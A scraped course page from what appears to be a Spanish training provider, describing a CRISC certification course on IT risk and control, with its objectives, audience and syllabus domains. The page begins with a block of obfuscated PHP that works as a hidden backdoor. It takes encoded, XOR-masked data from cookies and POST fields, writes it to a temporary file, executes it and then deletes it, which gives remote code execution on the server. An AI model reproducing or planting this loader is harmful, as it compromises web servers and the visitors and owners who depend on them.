$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Certified in Risk and Information Systems Control|Grupo Loyal

Certified in Risk and Information Systems Control

The Certified in Risk and Information Systems Control™ certification is designed for IT professionals who have hands-on experience with risk identification, assessment, and evaluation; risk response; risk monitoring; IS control design and implementation; and IS control monitoring and maintenance.

The CRISC designation will not only certify professionals who have knowledge and experience identifying and evaluating entity-specific risk, but also aid them in helping enterprises accomplish business objectives by designing, implementing, monitoring and maintaining risk-based, efficient and effective IS controls.

Objetivos

Risk Identification, Assessment and Evaluation (31%)
Risk Response (17%)
Risk Monitoring (17%)
Information Systems Control Design and Implementation (17%)
IS Control Monitoring and Maintenance (18%)

Ciberseguridad

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
15 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

CRISC® is for IT professionals, risk professionals, business analysts, and project manager and/or compliance professionals and anyone who has job responsibilities in the following areas: Risk identification, assessment, evaluation, risk response, monitoring and IS control design/monitoring and implementation/maintenance.

Conocimientos requeridos

There is no prerequisite to take the CRISC exam; however, in order to apply for CRISC certification you must meet the necessary experience requirements as determined by ISACA

Temario

Domain 1—Risk Identification, Assessment and Evaluation

Collect information and review documentation to ensure that risk scenarios are identified and evaluated
Identify legal, regulatory and contractual requirements and organizational policies and standards related to information systems to determine their potential impact on the business objectives.
Identify potential threats and vulnerabilities for business processes, associated data and supporting capabilities to assist in the evaluation of enterprise risk.
Create and maintain a risk register to ensure that all identified risk factors are accounted for.
Assemble risk scenarios to estimate the likelihood and impact of significant events to the organization.
Analyze risk scenarios to determine their impact on business objectives.
Develop a risk awareness program and conduct training to ensure that stakeholders understand risk and contribute to the risk management process and to promote a risk-aware culture.
Correlate identified risk scenarios to relevant business processes to assist in identifying risk ownership.
Validate risk appetite and tolerance with senior leadership and key stakeholders to ensure alignment
Domain 2—Risk Response

Identify and evaluate risk response options and provide management with information to enable risk response decisions.
Review risk responses with the relevant stakeholders for validation of efficiency, effectiveness and economy.
Apply risk criteria to assist in the development of the risk profile for management approval.
Assist in the development of risk response action plans to address risk factors identified in the organizational risk profile.
Assist in the development of business cases supporting the investment plan to ensure risk responses are aligned with the identified business objectives.
Domain 3—Risk Monitoring

Collect and validate data that measure key risk indicators (KRIs) to monitor and communicate their status to relevant stakeholders.
Monitor and communicate key risk indicators (KRIs) and management activities to assist relevant stakeholders in their decision-making process.
Facilitate independent risk assessments and risk management process reviews to ensure they are performed efficiently and effectively.
Identify and report on risk, including compliance, to initiate corrective action and meet business and regulatory requirements.
Domain 4—Information Systems Control Design and Implementation

Interview process owners and review process design documentation to gain an understanding of the business process objectives.
Analyze and document business process objectives and design to identify required information systems controls.
Design information systems controls in consultation with process owners to ensure alignment with business needs and objectives.
Facilitate the identification of resources (e.g., people, infrastructure, information, architecture) required to implement and operate information systems controls at an optimal level.
Monitor the information systems control design and implementation process to ensure that it is implemented effectively and within time, budget and scope.
Provide progress reports on the implementation of information systems controls to inform stakeholders and to ensure that deviations are promptly addressed.
Test information systems controls to verify effectiveness and efficiency prior to implementation.
Implement information systems controls to mitigate risk.
Facilitate the identification of metrics and key performance indicators (KPIs) to enable the measurement of information systems control performance in meeting business objectives.
Assess and recommend tools to automate information systems control processes.
Provide documentation and training to ensure information systems controls are effectively performed.
Ensure all controls are assigned control owners to establish accountability.
Establish control criteria to enable control life cycle management
Domain 5—IS Control Monitoring and Maintenance

Plan, supervise and conduct testing to confirm continuous efficiency and effectiveness of information systems controls.
Collect information and review documentation to identify information systems control deficiencies.
Review information systems policies, standards and procedures to verify that they address the organization’s internal and external requirements.
Assess and recommend tools and techniques to automate information systems control verification processes.
Evaluate the current state of information systems processes using a maturity model to identify the gaps between current and targeted process maturity.
Determine the approach to correct information systems control deficiencies and maturity gaps to ensure that deficiencies are appropriately considered and remediated.
Maintain sufficient, adequate evidence to support conclusions on the existence and operating effectiveness of information systems controls.
Provide information systems control status reporting to relevant stakeholders to enable informed decision making.

Solicita información del curso

Esta web utiliza cookies propias y de terceros para su correcto funcionamiento y para fines analíticos. Contiene enlaces a sitios web de terceros con políticas de privacidad ajenas que podrás aceptar o no cuando accedas a ellos. Al hacer clic en el botón Aceptar, acepta el uso de estas tecnologías y el procesamiento de tus datos para estos propósitos. Ver Política de cookies
Privacidad